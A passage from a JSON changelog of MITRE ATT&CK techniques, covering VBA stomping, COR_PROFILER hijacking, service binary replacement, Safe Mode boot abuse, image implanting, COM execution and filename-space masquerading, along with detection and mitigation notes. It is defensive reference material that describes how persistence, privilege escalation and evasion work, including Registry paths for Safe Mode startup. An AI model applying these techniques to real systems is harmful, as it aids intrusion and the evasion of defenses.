p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:00.627000+00:00\", \"old_value\": \"2025-04-15 19:59:06.926000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0012: Script (Script Execution)", + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-24 22:30:55.843000+00:00", + "modified": "2025-04-25 14:48:41.257000+00:00", + "name": "COR_PROFILER", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/012", + "external_id": "T1574.012" + }, + { + "source_name": "Microsoft Profiling Mar 2017", + "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview" + }, + { + "source_name": "Microsoft COR_PROFILER Feb 2013", + "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)" + }, + { + "source_name": "RedCanary Mockingbird May 2020", + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.", + "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/" + }, + { + "source_name": "Red Canary COR_PROFILER May 2020", + "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.", + "url": "https://redcanary.com/blog/cor_profiler-for-persistence/" + }, + { + "source_name": "Almond COR_PROFILER Apr 2019", + "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.", + "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html" + }, + { + "source_name": "GitHub OmerYa Invisi-Shell", + "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.", + "url": "https://github.com/OmerYa/Invisi-Shell" + }, + { + "source_name": "subTee .NET Profilers May 2017", + "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.", + "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jesse Brown, Red Canary" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification", + "Module: Module Load", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:41.257000+00:00\", \"old_value\": \"2025-04-15 19:59:25.301000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1018: User Account Management", + "M1024: Restrict Registry Permissions", + "M1038: Execution Prevention" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-03-12 20:43:53.998000+00:00", + "modified": "2025-04-25 14:47:32.419000+00:00", + "name": "Services File Permissions Weakness", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/010", + "external_id": "T1574.010" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Stefan Kanthak" + ], + "x_mitre_data_sources": [ + "File: File Modification", + "File: File Creation", + "Process: Process Creation", + "Service: Service Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.\n\nLook for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:32.419000+00:00\", \"old_value\": \"2025-04-16 20:37:18.533000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1018: User Account Management", + "M1047: Audit", + "M1052: User Account Control" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0019: Service (Service Metadata)", + "DS0022: File (File Creation)", + "DS0022: File (File Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-23 20:00:27.600000+00:00", + "modified": "2025-04-25 14:46:08.076000+00:00", + "name": "Safe Mode Boot", + "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1562/009", + "external_id": "T1562.009" + }, + { + "source_name": "Microsoft Safe Mode", + "description": "Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.", + "url": "https://support.microsoft.com/en-us/windows/start-your-pc-in-safe-mode-in-windows-10-92c27cff-db89-8644-1ce4-b3e5e56fe234" + }, + { + "source_name": "Sophos Snatch Ransomware 2019", + "description": "Sophos. (2019, December 9). Snatch ransomware reboots PCs into Safe Mode to bypass protection. Retrieved June 23, 2021.", + "url": "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/" + }, + { + "source_name": "Microsoft bcdedit 2021", + "description": "Microsoft. (2021, May 27). bcdedit. Retrieved June 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bcdedit" + }, + { + "source_name": "CyberArk Labs Safe Mode 2016", + "description": "Naim, D.. (2016, September 15). CyberArk Labs: From Safe Mode to Domain Compromise. Retrieved June 23, 2021.", + "url": "https://www.cyberark.com/resources/blog/cyberark-labs-from-safe-mode-to-domain-compromise" + }, + { + "source_name": "Cybereason Nocturnus MedusaLocker 2020", + "description": "Cybereason Nocturnus. (2020, November 19). Cybereason vs. MedusaLocker Ransomware. Retrieved June 23, 2021.", + "url": "https://www.cybereason.com/blog/medusalocker-ransomware" + }, + { + "source_name": "BleepingComputer REvil 2021", + "description": "Abrams, L. (2021, March 19). REvil ransomware has a new \u2018Windows Safe Mode\u2019 encryption mode. Retrieved June 23, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/" + }, + { + "source_name": "Microsoft Bootcfg", + "description": "Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jorell Magtibay, National Australia Bank Limited", + "Kiyohito Yamamoto, RedLark, NTT Communications", + "Yusuke Kubo, RedLark, NTT Communications" + ], + "x_mitre_data_sources": [ + "Windows Registry: Windows Registry Key Creation", + "Process: Process Creation", + "Windows Registry: Windows Registry Key Modification", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:08.076000+00:00\", \"old_value\": \"2025-04-15 19:58:15.415000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1054: Software Configuration" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Creation)", + "DS0024: Windows Registry (Windows Registry Key Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-04 12:04:03.552000+00:00", + "modified": "2025-04-25 15:15:30.983000+00:00", + "name": "Implant Internal Image", + "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim\u2019s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1525", + "external_id": "T1525" + }, + { + "source_name": "Rhino Labs Cloud Image Backdoor Technique Sept 2019", + "description": "Rhino Labs. (2019, August). Exploiting AWS ECR and ECS with the Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "url": "https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/" + }, + { + "source_name": "Rhino Labs Cloud Backdoor September 2019", + "description": "Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT). Retrieved September 12, 2019.", + "url": "https://github.com/RhinoSecurityLabs/ccat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Yossi Weizman, Azure Defender Research Team", + "Vishwas Manral, McAfee", + "Praetorian" + ], + "x_mitre_data_sources": [ + "Image: Image Metadata", + "Image: Image Creation", + "Image: Image Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.\n\nIn containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Containers" + ], + "x_mitre_version": "2.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:15:30.983000+00:00\", \"old_value\": \"2025-04-15 19:58:29.793000+00:00\"}}}", + "previous_version": "2.2", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1045: Code Signing", + "M1047: Audit" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0007: Image (Image Creation)", + "DS0007: Image (Image Metadata)", + "DS0007: Image (Image Modification)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-12 14:09:53.107000+00:00", + "modified": "2025-04-25 14:46:14.161000+00:00", + "name": "Component Object Model", + "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)\n\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1559/001", + "external_id": "T1559.001" + }, + { + "source_name": "Fireeye Hunting COM June 2019", + "description": "Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html" + }, + { + "source_name": "Microsoft COM", + "description": "Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx" + }, + { + "source_name": "ProjectZero File Write EoP Apr 2018", + "description": "Forshaw, J. (2018, April 18). Windows Exploitation Tricks: Exploiting Arbitrary File Writes for Local Elevation of Privilege. Retrieved May 3, 2018.", + "url": "https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html" + }, + { + "source_name": "Enigma Outlook DCOM Lateral Movement Nov 2017", + "description": "Nelson, M. (2017, November 16). Lateral Movement using Outlook's CreateObject Method and DotNetToJScript. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/" + }, + { + "source_name": "Enigma MMC20 COM Jan 2017", + "description": "Nelson, M. (2017, January 5). Lateral Movement using the MMC20 Application COM Object. Retrieved November 21, 2017.", + "url": "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Module: Module Load", + "Script: Script Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1059/001), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\n\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:14.161000+00:00\", \"old_value\": \"2025-04-15 19:58:18.425000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [ + "M1026: Privileged Account Management", + "M1048: Application Isolation and Sandboxing" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0012: Script (Script Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-02-10 20:47:10.082000+00:00", + "modified": "2025-04-25 14:48:22.412000+00:00", + "name": "Space after Filename", + "description": "Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\n\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).\n\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1036/006", + "external_id": "T1036.006" + }, + { + "source_name": "Mac Backdoors are back", + "description": "Dan Goodin. (2016, July 6). After hiatus, in-the-wild Mac backdoors are suddenly back. Retrieved July 8, 2017.", + "url": "https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Erye Hernandez, Palo Alto Networks" + ], + "x_mitre_data_sources": [ + "File: File Metadata" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:22.412000+00:00\", \"old_value\": \"2025-04-16 20:37:22.189000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0022: File (File Metadata)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--0708ae90-d0eb-4938-9a76-d0fc94f6eec1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-16 18:42:20.734000+00:00", + "modified": "2025-04-25 14:45:42.495000+00:00", + "name": "Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\n\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578/004", + "external_id": "T1578.004" + }, + { + "source_name": "Tech Republic - Restore AWS Snapshots", + "description": "Hardiman, N.. (2012, March 20). Backing up and restoring snapshots on Amazon EC2 machines. Retrieved October 8, 2019.", + "url": "https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/" + }, + { + "source_name": "Google - Restore Cloud Snapshot", + "description": "Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.", + "url": "https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Netskope" + ], + "x_mitre_data_sources": [ + "Instance: Instance Start", + "Instance: Instance Metadata", + "Instance: Instance Stop", + "Instance: Instance Modification" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:42.495000+00:00\", \"old_value\": \"2025-04-15 19:58:03.446000+00:00\"}}}", + "previous_version": "1.2", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0030: Instance (Instance Metadata)", + "DS0030: Instance (Instance Modification)", + "DS0030: Instance (Instance Start)", + "DS0030: Instance (Instance Stop)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-19 19:42:19.740000+00:00", + "modified": "2025-04-25 15:15:59.227000+00:00", + "name": "Modify System Image", + "description": "Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device 